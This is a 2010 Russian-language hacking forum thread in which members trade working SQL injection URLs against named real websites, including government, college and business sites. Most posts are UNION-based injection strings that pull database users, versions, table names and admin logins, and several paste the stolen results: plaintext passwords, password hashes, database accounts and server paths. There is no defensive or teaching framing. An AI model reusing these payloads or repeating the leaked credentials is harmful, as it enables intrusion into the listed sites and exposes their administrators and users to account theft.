RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2010-07-12 12:10:00.623333
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://obec.org.ru/author.php?Id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-14 09:09:00.323333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
gunusa, как раскрутишь скулю, не зная версии и БД?
|
|
|
RE: Ваши Sql-инъекции - 2010-07-14 12:21:08.280000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
ORIGINAL: gunusa Я сказал чтоб он до конца раскручивал скулю ,а не только писал concat_ws(0x3a3a3a,user(),database(),version()). Это не обязательно делать. Посмотри пример скули (первый пост), который можно постить, и сам даш себе ответ
|
|
|
RE: Ваши Sql-инъекции - 2010-07-15 21:45:11.296666
|
|
|
Centr1n0.1nSiDe
Сообщений: 18
Оценки: 0
Присоединился: 2010-07-15 17:07:21.620000
|
http://www.roda.hr/apeli.php?ID=-4+union+select+1,concat_ws%280x0b,username,0x3a,password,0x3a,admin_priv%29+from+roda_survey_users+limit+0,1+--+
http://www.roda.hr/apeli.php?ID=-4+union+select+1,concat_ws%280x0b,username,0x3a,password,0x3a,admin_priv%29+from+roda_survey_users+limit+1,1+--+ username:admin password:password username:roda password:BsB6dHD
|
|
|
RE: Ваши Sql-инъекции - 2010-07-15 22:15:31.143333
|
|
|
Centr1n0.1nSiDe
Сообщений: 18
Оценки: 0
Присоединился: 2010-07-15 17:07:21.620000
|
http://www.zdravlje.hr/clanak.php?id=-12826+union+select+group_concat%28table_name+separator+0x3a%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=0x6872766174313831+--+
http://www.zdravlje.hr/clanak.php?id=-12826+union+select+group_concat%28column_name+separator+0x3a%29,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x61646d696e+--+
http://www.zdravlje.hr/clanak.php?id=-12826+union+select+group_concat%28concat_ws%280x0b,rbr,0x3a,rbr_klub%29%29,2,3,4,5,6,7,8,9,10,11,12,13+from+admin+limit+0,20+--+
|
|
|
RE: Ваши Sql-инъекции - 2010-07-16 12:42:43.070000
|
|
|
aces007
Сообщений: 60
Оценки: 0
Присоединился: 2010-07-15 23:40:58.040000
|
http://www.zdravljeizprirode.hr/proizvod.php?id=-14+union+select+1,2,group_concat%28table_name+separator+0x3a%29,4+from+information_schema.tables+where+table_schema=0x7a647261767072695f7a6970+--+ http://www.zdravljeizprirode.hr/proizvod.php?id=-14+union+select+1,2,group_concat%28column_name+separator+0x3a%29,4+from+information_schema.columns+where+table_name=0x706f6c6c5f75736572+--+
http://www.zdravljeizprirode.hr/proizvod.php?id=-14+union+select+1,2,group_concat%28column_name+separator+0x3a%29,4+from+information_schema.columns+where+table_name=0x706f6c6c5f75736572+--+
|
|
|
RE: Ваши Sql-инъекции - 2010-07-16 17:05:47.050000
|
|
|
aces007
Сообщений: 60
Оценки: 0
Присоединился: 2010-07-15 23:40:58.040000
|
del
|
|
|
RE: Ваши Sql-инъекции - 2010-07-16 17:08:58.933333
|
|
|
aces007
Сообщений: 60
Оценки: 0
Присоединился: 2010-07-15 23:40:58.040000
|
http://www.zrsosijek.hr/izbornik.php?id=-7+UNION+SELECT+1,2,group_concat%28table_name+separator+0x3a%29,4+from+information_schema.tables+where+table_schema=0x7a72736f735f7a72736f+--+
|
|
|
RE: Ваши Sql-инъекции - 2010-07-20 00:31:57.996666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
Кто поможет раскурить? Буду признателен http://www.tarjaturunen.com/detalles_en.php
|
|
|
RE: Ваши Sql-инъекции - 2010-07-20 01:17:03.483333
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://www.tarjaturunen.com/news_sp.php?IdRubro=-38+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables-- sepo лови
|
|
|
RE: Ваши Sql-инъекции - 2010-07-20 02:42:33.030000
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://web-gamer.ru/comments.php?id=-224+union+select+1,2,concat(user(),0x2a,database(),0x2a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16 User: va91_webg@217.112.35.43 Database: va91_webg Version: 5.0.51a-log
|
|
|
RE: Ваши Sql-инъекции - 2010-07-21 00:56:29.053333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.fctz.ru/inner.php?action=section&idsec=1&idssec=13+and+sleep%283%29%23 вроде бы слепая скуля… толком не сморел… кто посмотрит отпишитесь…
|
|
|
RE: Ваши Sql-инъекции - 2010-07-22 10:32:30.973333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://jeremynoa.com/site/web.php?id=-2+union+select+0,1,2,3,concat(username,0x3a,password),5,6+from+users https://pingat.kwp.gov.my/galeriGambarView.php?&rs=next&rs_per_page=20&id=1%20and%201=2%20UNION%20SELECT%201,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12%20from%20pengguna-- http://www.dataposit.co.ke/news.php?ID=-1+union+select+0,group_concat%28username,0x3a,password%29,2,3+from+login-- http://nekar.gr/index.php?id=-1%20union%20select%200,concat(username,0x3a,password,0x3a,email),2,0x65786569207369676f75726120736f6261726f2070726f626c686d6120682053514c20746f75207369746521,4,5,6,7,8,9,10,11%20from%20admins-- http://goldsgym.co.id/news_detail.php?id=51+and+1=2+union+select+1,group_concat(Username,0x3a,Password)++from+users http://puspen.depdagri.go.id/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users-- http://stabmaitreyawira.ac.id/news_detail.php?id=-2+union+select+1,2,3,4,group_concat(username,0x3a,password),6+from+user--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-22 13:31:03.766666
|
|
|
Vlados777
Сообщений: 145
Оценки: 0
Присоединился: 2008-11-02 18:07:08.353333
|
http://www.amigo-tours.ru/czechia_ru/firms/index.html?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x2a,database(),0x2a,version()),15,16,17 User: amigo-tours@zvm14.host.ru Database: amigo-tours Version: 4.0.27-log
|
|
|
RE: Ваши Sql-инъекции - 2010-07-22 16:26:49.886666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.bhutan.gov.bt/government/newsDetail.php?id=-1495+union+select+1,2,group_concat(ID,0x3a,USERNAME,0x3a,PASSW,0x3a,FNAME,0x3a,MNAME,0x3a,LNAME,0x3a,EMAIL,0x3a,AGENCY,0x3a,STATUS,0x3a,ROLEID),4,5,6,7,8+from+users-- http://www.kitefestpasirgudang.com/Content.php?id=-2+union+select+group_concat(member_id,0x3a,member_login,0x3a,member_password),2,3,4+from+members--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-23 20:46:34.980000
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
Sepo Тема называется ваши Sql-инъекции А скули то оказывается не твои))) А именно твой приведущий пост где ты выложил 7 скулей http://my-bhie.blogspot.com/2010/06/kumpulan-site-bug-sqli-by-me.html Случайно набрел…
|
|
|
RE: Ваши Sql-инъекции - 2010-07-24 22:36:05.430000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: GaMeSTeR001 Sepo Тема называется ваши Sql-инъекции А скули то оказывается не твои))) А именно твой приведущий пост где ты выложил 7 скулей http://my-bhie.blogspot.com/2010/06/kumpulan-site-bug-sqli-by-me.html Случайно набрел… Посмотрел ссылку которую ты запостил говоря что я скопипстил скули с других ресурсов… интересный блог… Но! разве я виноват что гугл один, сайт уязвим для всех одинаково и не только я натыкаюсь на уязвимые ссылки? Пойми, нельзя проверить каждую ссыль очень чательно… я человек а не машина… если кто-то считает что я их скопипастил, удалите мой пост… заминусуйте меня… заодно и всех тех кто вообще что-то пишет на этом сайте… Но знай что копипастом я не занимаюсь! Какой смысл??? Я что за это деньги получаю??? Нет… Так что?
|
|
|
RE: Ваши Sql-инъекции - 2010-07-25 00:12:48.706666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.dawnprog.com/about.php?id=-2+union+select+1,2,3,SQL,5--
user:dawn_guest@82.195.232.140 basedir:/usr/ datadir:/var/lib/mysql/ tmpdir:/tmp/ os:redhat-linux-gnu base:dawn ver:5.0.45-log
|
|
|
RE: Ваши Sql-инъекции - 2010-07-25 01:11:59.946666
|
|
|
fasfas
Сообщений: 152
Оценки: 0
Присоединился: 2010-06-06 14:21:15.500000
|
http://think.maxwellrender.com/video.php?id=-56+union+select+1,group_concat(login,0x2a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+administrador Login: eladnts Pass: eladnts Login: nextlimit Pass: cocoliso Login: adminmaterials Pass: cocoliso Login: prueba Pass: prueba Login: rfresources Pass: cocoliso
|
|
|
RE: Ваши Sql-инъекции - 2010-07-25 08:52:23.783333
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
Sepo Просто очень похоже на копипаст, я понимаю если бы 1 совпадение или 2,3 а у тебя весь пост совпадает))
|
|
|
RE: Ваши Sql-инъекции - 2010-07-25 18:36:57.440000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.mabrinaproperties.co.za/read.php?id=-1+union+select+1,SQL,3,4,5--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-25 19:37:46.320000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://helmsmanmobile.com/stories/read.php?id=1&post_id=-23+union+select+1,2,SQL,4,5,6,7,8,9,10,11--
base:ici_v1 user:ken@localhost basedir:/usr/ datadir:/var/lib/mysql/ tmpdir:/tmp/ os:redhat-linux-gnu mysql.user:ken mysql.password:32e4874f1adb805a ver:5.0.45
|
|
|
RE: Ваши Sql-инъекции - 2010-07-25 19:42:29.336666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.caravantrekker.nl/vragen/read.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-25 19:53:18.246666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.krlmania.com/sinyal/read.php?id=-1+union+select+1,2,SQL,4,5,6,7,8,9,10-- —————————————– HOST: www.krlmania.com —————————————– System information: —————————————– user:krlmania_krl@localhost basedir:/ datadir:/var/lib/mysql/ tmpdir:/tmp/ os:pc-linux-gnu ver:5.0.90-community base:krlmania_redaktur
|
|
|
RE: Ваши Sql-инъекции - 2010-07-25 22:20:01.463333
|
|
|
brandon
Сообщений: 334
Оценки: 0
Присоединился: 2010-02-14 11:09:02.680000
|
prasuyoga.com.ua/index.php?id=99999+union+select+1,2,3,concat_ws(0x3a,id_user,username_user,password_user)+from+users_tab+limit+0,1–
|
|
|
RE: Ваши Sql-инъекции - 2010-07-25 22:43:18.563333
|
|
|
brandon
Сообщений: 334
Оценки: 0
Присоединился: 2010-02-14 11:09:02.680000
|
http://www.homeidei.ru/index.php?link=3&id=-20+union+select+concat(login,0x3a,pass),2,3+from+ost-- admin1:asdf7002
|
|
|
RE: Ваши Sql-инъекции - 2010-07-26 17:33:46.473333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://rie.cl/x.php?id=-9+union+select+1,SQL,3,4,5-- base:base2 user:us3r2@10.1.1.44 basedir:/usr/ datadir:/var/lib/mysql/ ver:5.0.45
|
|
|
RE: Ваши Sql-инъекции - 2010-07-26 17:38:14.753333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.casep.org.ve/x.php?id=-12+union+select+1,concat%28version%28%29,database%28%29,user%28%29%29,3,4,5,6--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-26 17:44:42.413333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.tollab.se/x.php?id=-30+union+select+1,2,SQL,4-- basedir:/usr/ datadir:/var/lib/mysql/ tmpdir:/tmp user:tollab_se@srv139.one.com os:debian-linux-gnu ver:5.0.51a-24+lenny3-log base:tollab_se
|
|
|
RE: Ваши Sql-инъекции - 2010-07-27 16:19:48.513333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://catalog.tabu.kz/rating.php?group_id=61+union+select+1,2,group_concat(email,0x3a,pass,0x0b)+from+cat_users--+
|
|
|
RE: Ваши Sql-инъекции - 2010-07-27 16:54:57.246666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.locman.kz/lekarstvo.php?ID=-6919+union+select+1,2,3,4,5,group_concat(table_name+separator+0x0b),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x762d313633375f6c6f636d616e5f677a--+
|
|
|
RE: Ваши Sql-инъекции - 2010-07-28 12:32:26.916666
|
|
|
Olex.Black
Сообщений: 3
Оценки: 0
Присоединился: 2010-07-25 19:00:49.100000
|
УГ/АМ
|
|
|
RE: Ваши Sql-инъекции - 2010-07-28 12:37:10.413333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.mandaptravels.com/voyager-avec-mandap-travel.php?id=-1+union+select+1,SQL,3,4,5,6,7-- base:db268471740 user:dbo268471740@212.227.119.58 basedir:/usr/local/mysql-5.0.81-linux-i686-glibc23/ datadir:/db/mysql/ tmpdir:/var/tmp ver:5.0.81-log os:pc-linux-gnu
|
|
|
RE: Ваши Sql-инъекции - 2010-07-28 20:27:56.536666
|
|
|
brandon
Сообщений: 334
Оценки: 0
Присоединился: 2010-02-14 11:09:02.680000
|
http://www.edwardparkerwines.co.uk/offers.php?id=-111+union+all+select+1,version(),group_concat(username,0x3a,password),4,5+from+usertable--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-29 14:26:27.303333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.nevod.net.ua/service.php?id=6+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4--+ Version: 4.0.27-standard-log User: olgaarg_nevodarg@localhost Database: olgaarg_nevod
|
|
|
RE: Ваши Sql-инъекции - 2010-07-31 18:33:02.896666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.cetonline.org/Events/events.php?id=-1+UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-31 18:36:56.386666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.lewiscountyuw.com/events.php?ID=-1+UNION SELECT 1,2,3,4,5,6,7,8,9,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),11,12,13--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-31 23:37:22.230000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://artmaxima.ua/service.php?id=157+and+1=2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5--+ Version: 5.0.91-community User: artmaxim_artmax@localhost Database: artmaxim_test
|
|
|
RE: Ваши Sql-инъекции - 2010-08-03 19:20:38.523333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.lagunacollege.edu/news.php?id=-4+union+all+select+1,2,group_concat%28ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email%29,4,concat_ws%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29,6,7%20from+wp_users+limit%200,1--
|
|
|
RE: Ваши Sql-инъекции - 2010-08-03 19:36:48.413333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.agenziaformula.it/news.php?id=-4+union+select+1,2,3,version%28%29–
|
|
|
|
|